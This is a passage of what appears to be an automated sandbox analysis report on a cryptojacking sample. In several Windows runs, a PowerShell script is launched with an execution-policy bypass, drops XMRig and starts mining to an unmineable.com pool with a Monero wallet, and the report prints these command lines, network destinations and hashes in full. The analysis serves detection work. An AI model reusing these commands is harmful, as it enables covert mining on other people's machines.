| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4700 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4700 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/4700-3-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4700-5-0x000001F2F1FA0000-0x000001F2F1FC2000-memory.dmp
memory/4700-6-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4700-9-0x000001F2F21D0000-0x000001F2F2246000-memory.dmp
memory/4700-18-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cqsc4gvw.ng3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4700-25-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4700-48-0x000001F2F21B0000-0x000001F2F21C2000-memory.dmp
memory/4700-61-0x000001F2F21A0000-0x000001F2F21AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/624-90-0x000001F8D92D0000-0x000001F8D92F0000-memory.dmp
memory/624-91-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/4700-93-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4700-94-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/624-92-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/4700-95-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/624-96-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-97-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-98-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-99-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-100-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-101-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-102-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-103-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-104-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-105-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-106-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-107-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-108-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-109-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-110-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-111-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-112-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-113-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-114-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-115-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-116-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-117-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-118-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-119-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-120-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-121-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-122-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-123-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-124-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-125-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-126-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-127-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-128-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-129-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-130-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-131-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-132-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-133-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-134-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-135-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-136-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-137-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-138-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-139-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-140-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-141-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-142-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-143-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-144-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-145-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-146-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-147-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-148-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-149-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-150-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-151-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-152-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-153-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-154-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-155-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-156-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4120 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4120 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4120-0-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wjtyd1uk.d0n.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4120-9-0x00000232DC540000-0x00000232DC562000-memory.dmp
memory/4120-10-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/4120-11-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/4120-12-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/4120-14-0x00000232DC5D0000-0x00000232DC5E2000-memory.dmp
memory/4120-15-0x00000232DC5C0000-0x00000232DC5CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2872-46-0x000001B1C42C0000-0x000001B1C42E0000-memory.dmp
memory/2872-47-0x000001B1C4310000-0x000001B1C4330000-memory.dmp
memory/2872-48-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/4120-50-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/2872-49-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/4120-51-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp
memory/2872-54-0x000001B1C4350000-0x000001B1C4370000-memory.dmp
memory/2872-53-0x000001B1C4330000-0x000001B1C4350000-memory.dmp
memory/4120-52-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/2872-55-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-56-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-58-0x000001B1C4350000-0x000001B1C4370000-memory.dmp
memory/2872-57-0x000001B1C4330000-0x000001B1C4350000-memory.dmp
memory/2872-59-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-60-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-61-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-62-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-63-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-64-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-65-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-66-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-67-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-68-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-69-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-70-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-71-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-72-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-73-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-74-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-75-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-76-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-77-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-78-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-79-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-80-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-81-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-82-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-83-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-84-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-85-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-86-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-87-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-88-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-89-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-90-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-91-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-92-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-93-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-94-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-95-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-96-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-97-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-98-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-99-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-100-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-101-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-102-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-103-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-104-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-105-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-106-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-107-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-108-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-109-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-110-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-111-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-112-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-113-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-114-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-115-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-116-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-117-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:47
Platform
win10-20240404-en
Max time kernel
1794s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2812 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2812 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
